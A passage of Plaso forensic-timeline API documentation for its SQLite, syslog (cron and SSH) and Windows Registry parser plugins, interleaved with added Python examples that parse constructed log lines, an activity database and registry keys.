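    if not check_required_structure(connection):
        return []  # plugin declines the database; Plaso tries the next one
    connection.row_factory = sqlite3.Row
    events = []
    for query, callback_name in QUERIES:
        for row in connection.execute(query):
            events.append(CALLBACKS[callback_name](row))
    return events


def build_sample_database(with_package_table=True):
    """Constructed ActivitiesCache.db: one generic and one UserEngaged activity
    (2021-06-06 12:00 and 13:00 UTC). Without the package table the
    REQUIRED_STRUCTURE gate must reject it."""
    connection = sqlite3.connect(':memory:')
    schema = SCHEMA_SQL if with_package_table else SCHEMA_SQL.split(
        'CREATE TABLE Activity_PackageId')[0]
    connection.executescript(schema)
    app_id = json.dumps([{'application': 'C:\\Python34\\python.exe',
                          'platform': 'x_exe_path'}])
    connection.execute('INSERT INTO Activity VALUES (?, ?, ?, ?)', (
        'a1', app_id, json.dumps({'appDisplayName': 'Python',
                                  'description': 'C:\\Users\\alice\\script.py'}
                                 ).encode('utf-8'), 1622980800))
    connection.execute('INSERT INTO Activity VALUES (?, ?, ?, ?)', (
        'a2', app_id, json.dumps({'type': 'UserEngaged',
                                  'reportingApp': 'ShellActivityMonitor',
                                  'activeDurationSeconds': 42}
                                 ).encode('utf-8'), 1622984400))
    if with_package_table:
        connection.execute('INSERT INTO Activity_PackageId VALUES (?, ?, ?, ?)',
                           ('a2', 'packageid', 'Docker.DockerForWindows.Settings', 0))
    connection.commit()
    return connection


if __name__ == '__main__':
    for event in extract_events(build_sample_database()):
        print(event)
```

Note what the two queries do with the same Activity table: the instr() test splits rows into UserEngaged and everything else, and only the UserEngaged rows are joined to Activity_PackageId, which is why a database missing that table fails REQUIRED_STRUCTURE rather than half-parsing.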


Module contents

Imports for the SQLite database parser plugins.

plaso.parsers.syslog_plugins package

Submodules

plaso.parsers.syslog_plugins.cron module

This file contains a plugin for cron syslog entries.

class plaso.parsers.syslog_plugins.cron.CronSyslogPlugin
    Bases: plaso.parsers.syslog_plugins.interface.SyslogPlugin

    A syslog plugin for parsing cron messages.

    DATA_FORMAT = 'Cron syslog line'

    MESSAGE_GRAMMARS = [('task_run', {{{{{{{"(" W:(ABCD...)} ")"} "CMD"} "("} Combine:(SkipTo:({")" StringEnd}))} ")"} StringEnd})]
        (pyparsing representation of the grammar: "(" username ")" "CMD" "(" command ")" followed by end of line)

    NAME = 'cron'

    REPORTER = 'CRON'

class plaso.parsers.syslog_plugins.cron.CronTaskRunEventData
    Bases: plaso.parsers.syslog.SyslogLineEventData

    Cron task run event data.

    command
        command executed.
        Type: str
    username
        name of the user the command was executed as.
        Type: str

    DATA_TYPE = 'syslog:cron:task_run'

plaso.parsers.syslog_plugins.interface module

This file contains the interface for syslog plugins.

class plaso.parsers.syslog_plugins.interface.SyslogPlugin
    Bases: plaso.parsers.plugins.BasePlugin

    The interface for syslog plugins.

    DATA_FORMAT = 'Syslog file'

    MESSAGE_GRAMMARS = []

    NAME = 'syslog_plugin'

    Process(parser_mediator, date_time, syslog_tokens, **kwargs)
        Processes the data structure produced by the parser.


        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • date_time (dfdatetime.DateTimeValues) – date and time values.
            • syslog_tokens (dict[str, str]) – keys are the names of the fields extracted by the syslog parser and the matching grammar; values are the values of those fields.

        Raises
            • AttributeError – If the syslog_tokens do not include a 'body' attribute.
            • WrongPlugin – If the plugin is unable to parse the syslog tokens.

    REPORTER = ''

plaso.parsers.syslog_plugins.ssh module

This file contains a plugin for SSH syslog entries.

class plaso.parsers.syslog_plugins.ssh.SSHEventData
    Bases: plaso.parsers.syslog.SyslogLineEventData

    SSH event data.

    address
        IP address.
        Type: str
    authentication_method
        authentication method.
        Type: str
    fingerprint
        fingerprint.
        Type: str
    port
        port.
        Type: str
    protocol
        protocol.
        Type: str
    username
        name of the user that authenticated (or attempted to).
        Type: str

class plaso.parsers.syslog_plugins.ssh.SSHFailedConnectionEventData
    Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData

    SSH failed connection event data.

    DATA_TYPE = 'syslog:ssh:failed_connection'

class plaso.parsers.syslog_plugins.ssh.SSHLoginEventData
    Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData

    SSH login event data.

    DATA_TYPE = 'syslog:ssh:login'

class plaso.parsers.syslog_plugins.ssh.SSHOpenedConnectionEventData
    Bases: plaso.parsers.syslog_plugins.ssh.SSHEventData

    SSH opened connection event data.

    DATA_TYPE = 'syslog:ssh:opened_connection'

class plaso.parsers.syslog_plugins.ssh.SSHSyslogPlugin
    Bases: plaso.parsers.syslog_plugins.interface.SyslogPlugin

    A plugin for creating events from syslog messages produced by SSH.

    DATA_FORMAT = 'SSH syslog line'

    MESSAGE_GRAMMARS = [
        ('login', {{{{{{{{{{"Accepted" {"password" | "publickey"}} "for"} W:(ABCD...)} "from"} {IPv4 address | IPv6 address}} "port"} W:(0123...)} "ssh2"} [{":" Combine:({"RSA " W:(:012...)})}]} StringEnd}),
        ('failed_connection', {{{{{{{{"Failed" {"password" | "publickey"}} "for"} W:(ABCD...)} "from"} {IPv4 address | IPv6 address}} "port"} W:(0123...)} StringEnd}),
        ('opened_connection', {{{{"Connection from" {IPv4 address | IPv6 address}} "port"} W:(0123...)} LineEnd})]

    NAME = 'ssh'

    REPORTER = 'sshd'
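The cron and ssh plugins above show the syslog plugin contract end to end: the syslog parser splits a line into header tokens (timestamp, hostname, reporter, body), the plugin whose REPORTER equals the reporter token is offered the body, and the first MESSAGE_GRAMMARS entry that parses it decides the event's data type and fields. The following is an added example, not Plaso's code, covering both the cron and ssh plugins: the pyparsing grammars are rendered as regular expressions, the syslog lines are constructed (the key fingerprint is made up), and two places go beyond the page's grammars and are marked as such in the code: sshd's "invalid user" prefix on failed logins, and key types other than RSA on successful public-key logins. The year is absent from BSD syslog headers, which is why the timestamp is kept as a string here and Plaso has to infer the year from the file.

```python
"""Syslog plugin dispatch for cron and sshd lines (added example, not Plaso code)."""
import re

# BSD syslog header: "Mon DD hh:mm:ss host reporter[pid]: body".
SYSLOG_LINE = re.compile(
    r'^(?P<timestamp>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) (?P<hostname>\S+) '
    r'(?P<reporter>[^\s\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<body>.*)$')

_ADDRESS = r'(?P<address>[0-9A-Fa-f:.]+)'  # IPv4 or IPv6 literal

# (data_type, grammar) pairs per REPORTER, the role MESSAGE_GRAMMARS plays.
PLUGINS = {
    'sshd': [
        ('syslog:ssh:login', re.compile(
            r'^Accepted (?P<authentication_method>password|publickey) for '
            r'(?P<username>\S+) from ' + _ADDRESS + r' port (?P<port>\d+) '
            r'(?P<protocol>ssh2)'
            # generalisation: the page's grammar only accepts "RSA <fingerprint>"
            r'(?:: (?P<key_type>RSA|ECDSA|ED25519|DSA) (?P<fingerprint>\S+))?$')),
        ('syslog:ssh:failed_connection', re.compile(
            r'^Failed (?P<authentication_method>password|publickey) for '
            r'(?:invalid user )?'  # generalisation: not in the page's grammar
            r'(?P<username>\S+) from ' + _ADDRESS + r' port (?P<port>\d+)'
            r'(?: (?P<protocol>ssh2))?$')),
        ('syslog:ssh:opened_connection', re.compile(
            r'^Connection from ' + _ADDRESS + r' port (?P<port>\d+)')),
    ],
    'CRON': [
        ('syslog:cron:task_run', re.compile(
            r'^\((?P<username>[^)]+)\) CMD \((?P<command>.*)\)$')),
    ],
}


def parse_syslog_line(line):
    """Return an event dict for the line, or None when no plugin claims it
    (Plaso then falls back to a plain syslog:line event)."""
    header = SYSLOG_LINE.match(line)
    if not header:
        raise ValueError('not a BSD syslog line: {0!r}'.format(line))
    tokens = header.groupdict()
    for data_type, grammar in PLUGINS.get(tokens['reporter'], []):
        match = grammar.match(tokens['body'])
        if match:
            event = {'data_type': data_type, 'timestamp': tokens['timestamp'],
                     'hostname': tokens['hostname'], 'reporter': tokens['reporter']}
            event.update({key: value for key, value in match.groupdict().items()
                          if value is not None})
            return event
    return None


# Constructed sample: a key login, a brute-force style failure, an IPv6
# connection, a cron job and a line no plugin claims.
SAMPLE_LINES = [
    'Jun  6 12:00:01 bastion sshd[4242]: Accepted publickey for alice from '
    '10.0.0.5 port 51234 ssh2: RSA SHA256:3kq1ExampleFingerprintNotReal',
    'Jun  6 12:00:07 bastion sshd[4250]: Failed password for invalid user admin '
    'from 203.0.113.9 port 40022 ssh2',
    'Jun  6 12:00:09 bastion sshd[4251]: Connection from 2001:db8::1 port 50001',
    'Jun  6 12:00:10 bastion CRON[4260]: (root) CMD (run-parts /etc/cron.hourly)',
    'Jun  6 12:00:11 bastion systemd[1]: Started Daily apt activities.',
]


def parse_sample():
    return [parse_syslog_line(line) for line in SAMPLE_LINES]


def failed_logins_by_address(events):
    """Triage helper: count failed_connection events per source address."""
    counts = {}
    for event in events:
        if event and event['data_type'] == 'syslog:ssh:failed_connection':
            counts[event['address']] = counts.get(event['address'], 0) + 1
    return counts


if __name__ == '__main__':
    for event in parse_sample():
        print(event)
    print(failed_logins_by_address(parse_sample()))
```

The REPORTER check matters more than it looks: a CRON body that happens to contain "Accepted password for" must never be handed to the ssh grammars, so plugin selection is by reporter first and grammar second, exactly the order SyslogPlugin.Process enforces before raising WrongPlugin.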

Module contents

Imports for the syslog parser.

plaso.parsers.winreg_plugins package

Submodules

plaso.parsers.winreg_plugins.amcache module

Windows Registry plugin to parse the AMCache.hve Root key.

class plaso.parsers.winreg_plugins.amcache.AMCacheFileEventData
    Bases: plaso.containers.events.EventData

    AMCache file event data.

    company_name
        company name of the product the file belongs to.
        Type: str
    file_description
        description of the file.
        Type: str


    file_reference
        file system file reference, for example 9-1 (MFT entry - sequence number).
        Type: str
    file_size
        size of the file in bytes.
        Type: int
    file_version
        version of the file.
        Type: str
    full_path
        full path of the file.
        Type: str
    language_code
        language code of the file.
        Type: int
    product_name
        name of the product the file belongs to.
        Type: str
    program_identifier
        GUID of the entry under the Root/Program key that the file belongs to.
        Type: str
    sha1
        SHA-1 of the file.
        Type: str

    DATA_TYPE = 'windows:registry:amcache'

class plaso.parsers.winreg_plugins.amcache.AMCachePlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    AMCache.hve Windows Registry plugin.

    DATA_FORMAT = 'AMCache (AMCache.hve)'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'amcache'

class plaso.parsers.winreg_plugins.amcache.AMCacheProgramEventData
    Bases: plaso.containers.events.EventData

    AMCache programs event data.

    entry_type
        type of entry (usually AddRemoveProgram).
        Type: str
    file_paths
        file paths of the installed program.
        Type: str
    files
        list of files belonging to the program.
        Type: str
    language_code
        language code of the program.
        Type: int
    msi_package_code
        MSI package code of the program.
        Type: str
    msi_product_code
        MSI product code of the program.
        Type: str
    name
        name of the installed program.
        Type: str
    package_code
        package code of the program.
        Type: str
    product_code
        product code of the program.
        Type: str
    publisher
        publisher of the program.
        Type: str
    uninstall_key
        Unicode string of the uninstall Registry key for the program.
        Type: str
    version
        version of the program.
        Type: str

    DATA_TYPE = 'windows:registry:amcache:programs'

plaso.parsers.winreg_plugins.appcompatcache module

Windows Registry plugin to parse the Application Compatibility Cache key.

class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheCachedEntry
    Bases: object

    Application Compatibility Cache cached entry.

class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheEventData
    Bases: plaso.containers.events.EventData

    Application Compatibility Cache event data.

    entry_index
        cache entry index number for the record.
        Type: int
    key_path
        Windows Registry key path.
        Type: str
    offset
        offset of the Application Compatibility Cache entry relative to the start of the Windows Registry value data, from which the event data was extracted.
        Type: int
    path
        full path to the executable.
        Type: str

    DATA_TYPE = 'windows:registry:appcompatcache'

class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheHeader
    Bases: object

    Application Compatibility Cache header.

class plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Application Compatibility Cache data Windows Registry plugin.

    DATA_FORMAT = 'Application Compatibility Cache Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Raises
            ParseError – if the value data could not be parsed.

    FILTERS = frozenset({, })


    NAME = 'appcompatcache'

plaso.parsers.winreg_plugins.bagmru module

This file contains BagMRU Windows Registry plugins (shellbags).

class plaso.parsers.winreg_plugins.bagmru.BagMRUEventData
    Bases: plaso.containers.events.EventData

    BagMRU event data attribute container.

    entries
        most recently used (MRU) entries.
        Type: str
    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:bagmru'

class plaso.parsers.winreg_plugins.bagmru.BagMRUWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Class that defines a BagMRU Windows Registry plugin.

    DATA_FORMAT = 'BagMRU (or ShellBags) Registry data'

    ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
        Extracts events from a Windows Registry key.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.
            • codepage (Optional[str]) – extended ASCII string codepage.

    FILTERS = frozenset({, , , , , })

    NAME = 'bagmru'

plaso.parsers.winreg_plugins.bam module

Windows Registry plugin to parse the Background Activity Moderator keys.

class plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventData
    Bases: plaso.containers.events.EventData

    Background Activity Moderator event data.

    binary_path
        binary executed.
        Type: str
    user_sid
        user SID associated with the entry.
        Type: str

    DATA_TYPE = 'windows:registry:bam'

class plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Background Activity Moderator data Windows Registry plugin.

    DATA_FORMAT = 'Background Activity Moderator (BAM) Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Raises
            ParseError – if the value data could not be parsed.

    FILTERS = frozenset({, })

    NAME = 'bam'

plaso.parsers.winreg_plugins.ccleaner module

Parser for the CCleaner Registry key.

class plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventData
    Bases: plaso.containers.events.EventData

    CCleaner configuration event data.

    configuration
        CCleaner configuration.
        Type: str


    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'ccleaner:configuration'

class plaso.parsers.winreg_plugins.ccleaner.CCleanerPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Gathers the CCleaner keys from the NTUSER hive.

    Known Windows Registry values within the CCleaner key:

    • (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned;
    • (App)Delete Index.dat files [REG_SZ]
    • (App)History [REG_SZ]
    • (App)Last Download Location [REG_SZ]
    • (App)Other Explorer MRUs [REG_SZ]
    • (App)Recent Documents [REG_SZ]
    • (App)Recently Typed URLs [REG_SZ]
    • (App)Run (in Start Menu) [REG_SZ]
    • (App)Temporary Internet Files [REG_SZ]
    • (App)Thumbnail Cache [REG_SZ]
    • CookiesToSave [REG_SZ]
    • UpdateKey [REG_SZ], contains a date and time formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM";
    • WINDOW_HEIGHT [REG_SZ], contains the window height in number of pixels;
    • WINDOW_LEFT [REG_SZ]
    • WINDOW_MAX [REG_SZ]
    • WINDOW_TOP [REG_SZ]
    • WINDOW_WIDTH [REG_SZ], contains the window width in number of pixels.

    Also see: http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html

    DATA_FORMAT = 'CCleaner Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'ccleaner'

class plaso.parsers.winreg_plugins.ccleaner.CCleanerUpdateEventData
    Bases: plaso.containers.events.EventData

    CCleaner update event data.

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'ccleaner:update'
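Every Windows Registry plugin above (amcache, appcompatcache, bagmru, bam, ccleaner) is attached to keys through its FILTERS set, built from the filter classes the interface module documents further down: exact key path, key path prefix, key path suffix, and key-with-values. The registry parser runs a plugin's ExtractEvents only for keys one of its filters matches; keys no plugin claims go to winreg_default. The following is an added example, not Plaso's code, that re-implements the four filter kinds on a minimal key object and dispatches constructed keys to plugin names. The filter object reprs were lost from this page, so the key paths registered here for ccleaner, appcompatcache and bam are given from memory of those plugins and should be treated as assumptions; the two *_demo entries are hypothetical and exist only to exercise the suffix and values filters. The example goes beyond the page in one way: it folds ControlSetNNN onto CurrentControlSet and drops Wow6432Node, so that one filter path matches both a live registry view and an offline SYSTEM or SOFTWARE hive.

```python
"""Registry key filters and plugin dispatch (added example, not Plaso code)."""
import re
from dataclasses import dataclass, field

_CONTROL_SET = re.compile(r'^(HKEY_LOCAL_MACHINE\\SYSTEM\\)CONTROLSET\d{3}(?=\\|$)')
_WOW64 = re.compile(r'^(HKEY_LOCAL_MACHINE\\SOFTWARE\\)WOW6432NODE(?:\\|$)')


def canonical_path(key_path):
    """Case-fold the path and normalise the two aliases that otherwise make a
    single filter path miss offline hives (generalisation, see lead-in)."""
    path = key_path.upper()
    path = _CONTROL_SET.sub(r'\g<1>CURRENTCONTROLSET', path)
    path = _WOW64.sub(r'\g<1>', path)
    return path.rstrip('\\')


@dataclass
class RegistryKey:
    """Minimal stand-in for dfwinreg.WinRegistryKey: path plus value names."""
    path: str
    values: dict = field(default_factory=dict)


class WindowsRegistryKeyPathFilter:
    def __init__(self, key_path):
        self._key_path = canonical_path(key_path)

    def Match(self, registry_key):
        return canonical_path(registry_key.path) == self._key_path


class WindowsRegistryKeyPathPrefixFilter:
    def __init__(self, key_path_prefix):
        self._prefix = canonical_path(key_path_prefix)

    def Match(self, registry_key):
        # Match on whole path components only: "...\Piriform" must not claim
        # "...\PiriformX".
        path = canonical_path(registry_key.path)
        return path == self._prefix or path.startswith(self._prefix + '\\')


class WindowsRegistryKeyPathSuffixFilter:
    def __init__(self, key_path_suffix):
        self._suffix = canonical_path(key_path_suffix)

    def Match(self, registry_key):
        return canonical_path(registry_key.path).endswith(self._suffix)


class WindowsRegistryKeyWithValuesFilter:
    def __init__(self, value_names):
        self._value_names = {name.upper() for name in value_names}

    def Match(self, registry_key):
        present = {name.upper() for name in registry_key.values}
        return self._value_names <= present


# What each plugin's FILTERS would contain. Paths are assumptions (see lead-in);
# the *_demo entries are hypothetical.
PLUGIN_FILTERS = {
    'ccleaner': [WindowsRegistryKeyPathFilter(
        'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')],
    'appcompatcache': [
        WindowsRegistryKeyPathFilter('HKEY_LOCAL_MACHINE\\System\\CurrentControlSet'
                                     '\\Control\\Session Manager\\AppCompatibility'),
        WindowsRegistryKeyPathFilter('HKEY_LOCAL_MACHINE\\System\\CurrentControlSet'
                                     '\\Control\\Session Manager\\AppCompatCache')],
    'bam': [
        WindowsRegistryKeyPathFilter('HKEY_LOCAL_MACHINE\\System\\CurrentControlSet'
                                     '\\Services\\bam\\UserSettings'),
        WindowsRegistryKeyPathFilter('HKEY_LOCAL_MACHINE\\System\\CurrentControlSet'
                                     '\\Services\\bam\\State\\UserSettings')],
    'mru_suffix_demo': [WindowsRegistryKeyPathSuffixFilter('\\RecentDocs')],
    'mru_values_demo': [WindowsRegistryKeyWithValuesFilter(['MRUListEx'])],
}


def select_plugins(registry_key):
    """Names of the plugins whose FILTERS match; winreg_default when none do."""
    names = [name for name, filters in PLUGIN_FILTERS.items()
             if any(key_filter.Match(registry_key) for key_filter in filters)]
    return names or ['winreg_default']


# Constructed keys: an offline SYSTEM hive control set, a lower-cased NTUSER
# path, an Explorer MRU key and a 32-bit-view application key.
SAMPLE_KEYS = [
    RegistryKey('HKEY_LOCAL_MACHINE\\System\\ControlSet001\\Control\\Session Manager'
                '\\AppCompatCache', {'AppCompatCache': b'\x34\x00\x00\x00'}),
    RegistryKey('hkey_current_user\\software\\piriform\\ccleaner',
                {'UpdateKey': '07/13/2013 10:03:14 AM'}),
    RegistryKey('HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion'
                '\\Explorer\\RecentDocs', {'MRUListEx': b'\x00\x00\x00\x00'}),
    RegistryKey('HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Vendor\\App',
                {'Version': '1.0'}),
]


def classify_sample():
    return {key.path: select_plugins(key) for key in SAMPLE_KEYS}


if __name__ == '__main__':
    for path, plugins in classify_sample().items():
        print('{0:s} -> {1!s}'.format(path, plugins))
```

The ControlSet folding is what lets a filter written for CurrentControlSet fire on a SYSTEM hive carved from an image, where only ControlSet001/ControlSet002 exist; without it appcompatcache and bam would silently yield nothing on exactly the evidence they are meant for.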


plaso.parsers.winreg_plugins.default module

The default Windows Registry plugin.

class plaso.parsers.winreg_plugins.default.DefaultPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Default plugin that extracts minimum information from every Registry key.

    The default plugin will parse every Registry key that is passed to it and extract minimum information, such as a list of available values and, if possible, the content of those values. The timestamp used is the timestamp when the Registry key was last modified.

    DATA_FORMAT = 'Windows Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    NAME = 'winreg_default'

plaso.parsers.winreg_plugins.interface module

The Wind Windows Registry plugin interface.

class plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter
    Bases: object

    The Windows Registry key filter interface.

    abstract Match(registry_key)
        Determines if a Windows Registry key matches the filter.

        Parameters
            registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Returns
            True if the keys match.

        Return type
            bool

    property key_paths
        key paths defined by the filter.
        Type: list[str]

class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter(key_path)
    Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter

    Windows Registry key path filter.

    Match(registry_key)
        Determines if a Windows Registry key matches the filter.

        Parameters
            registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Returns
            True if the keys match.

        Return type
            bool


    property key_paths
        List of key paths defined by the filter.

class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathPrefixFilter(key_path_prefix)
    Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter

    Windows Registry key path prefix filter.

    Match(registry_key)
        Determines if a Windows Registry key matches the filter.

        Parameters
            registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Returns
            True if the keys match.

        Return type
            bool

class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathSuffixFilter(key_path_suffix)
    Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter

    Windows Registry key path suffix filter.

    Match(registry_key)
        Determines if a Windows Registry key matches the filter.

        Parameters
            registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Returns
            True if the keys match.

        Return type
            bool

class plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter(value_names)
    Bases: plaso.parsers.winreg_plugins.interface.BaseWindowsRegistryKeyFilter

    Windows Registry key with values filter.

    Match(registry_key)
        Determines if a Windows Registry key matches the filter.

        Parameters
            registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Returns
            True if the keys match.

        Return type
            bool

class plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin
    Bases: plaso.parsers.plugins.BasePlugin

    The Windows Registry plugin interface.

    DATA_FORMAT = 'Windows Registry data'

    abstract ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'winreg_plugin'

    Process(parser_mediator, registry_key, **kwargs)
        Processes a Windows Registry key or value.


        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Raises
            ValueError – If the Windows Registry key is not set.

    UpdateChainAndProcess(parser_mediator, registry_key, **kwargs)
        Updates the parser chain and processes a Windows Registry key or value.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

        Raises
            ValueError – If the Windows Registry key is not set.

plaso.parsers.winreg_plugins.lfu module

Plug-in to collect the Less Frequently Used keys.

class plaso.parsers.winreg_plugins.lfu.BootExecutePlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Plug-in to collect the BootExecute value from the Session Manager key.

    Also see: http://technet.microsoft.com/en-us/library/cc963230.aspx

    DATA_FORMAT = 'Boot Execution Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'windows_boot_execute'

class plaso.parsers.winreg_plugins.lfu.BootVerificationPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Plug-in to collect the Boot Verification key.

    Also see: http://technet.microsoft.com/en-us/library/cc782537(v=ws.10).aspx

    DATA_FORMAT = 'Windows boot verification Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters

5.1. Subpackages 327 Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_boot_verify' class plaso.parsers.winreg_plugins.lfu.WindowsBootExecuteEventData Bases: plaso.containers.events.EventData Windows Boot Execute event data attribute container. key_path Windows Registry key path. Type str value boot execute value, contains the value obtained from the BootExecute Registry value. Type str DATA_TYPE = 'windows:registry:boot_execute' class plaso.parsers.winreg_plugins.lfu.WindowsBootVerificationEventData Bases: plaso.containers.events.EventData Windows Boot Verification event data attribute container. image_path location of the boot verification executable, contains the value obtained from the ImagePath Registry value. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:boot_verification' plaso.parsers.winreg_plugins.mountpoints module

MountPoints2 Windows Registry parser plugin.

class plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventData
    Bases: plaso.containers.events.EventData

    Windows MountPoints2 event data attribute container.

    key_path
        Windows Registry key path.
        Type: str

    label
        mount point label.
        Type: str

    name
        name of the mount point source.
        Type: str

    server_name
        name of the remote drive server or None if not set.
        Type: str

    share_name
        name of the remote drive share or None if not set.
        Type: str

    type
        type of the mount point source, which can be “Drive”, “Remote Drive” or “Volume”.
        Type: str

    DATA_TYPE = 'windows:registry:mount_points2'

class plaso.parsers.winreg_plugins.mountpoints.MountPoints2Plugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

    Windows Registry plugin for parsing the MountPoints2 key.

    DATA_FORMAT = 'Windows Explorer mount points Registry data'

    ExtractEvents(parser_mediator, registry_key, **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

    FILTERS = frozenset({})

    NAME = 'explorer_mountpoints2'

plaso.parsers.winreg_plugins.mrulist module

This file contains a MRUList Registry plugin.

Also see: https://github.com/libyal/winreg-kb/blob/main/documentation/MRU%20keys.asciidoc

class plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib.dtfabric_helper.DtFabricHelper

    Class for common MRUList Windows Registry plugin functionality.

class plaso.parsers.winreg_plugins.mrulist.MRUListEventData
    Bases: plaso.containers.events.EventData

    MRUList event data attribute container.

    entries
        most recently used (MRU) entries.
        Type: str

    key_path
        Windows Registry key path.
        Type: str

    DATA_TYPE = 'windows:registry:mrulist'

class plaso.parsers.winreg_plugins.mrulist.MRUListShellItemListWindowsRegistryPlugin
    Bases: plaso.parsers.winreg_plugins.mrulist.BaseMRUListWindowsRegistryPlugin

    Windows Registry plugin to parse a shell item list MRUList.

    DATA_FORMAT = 'Most Recently Used (MRU) Registry data'

    ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs)
        Extracts events from a Windows Registry key.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
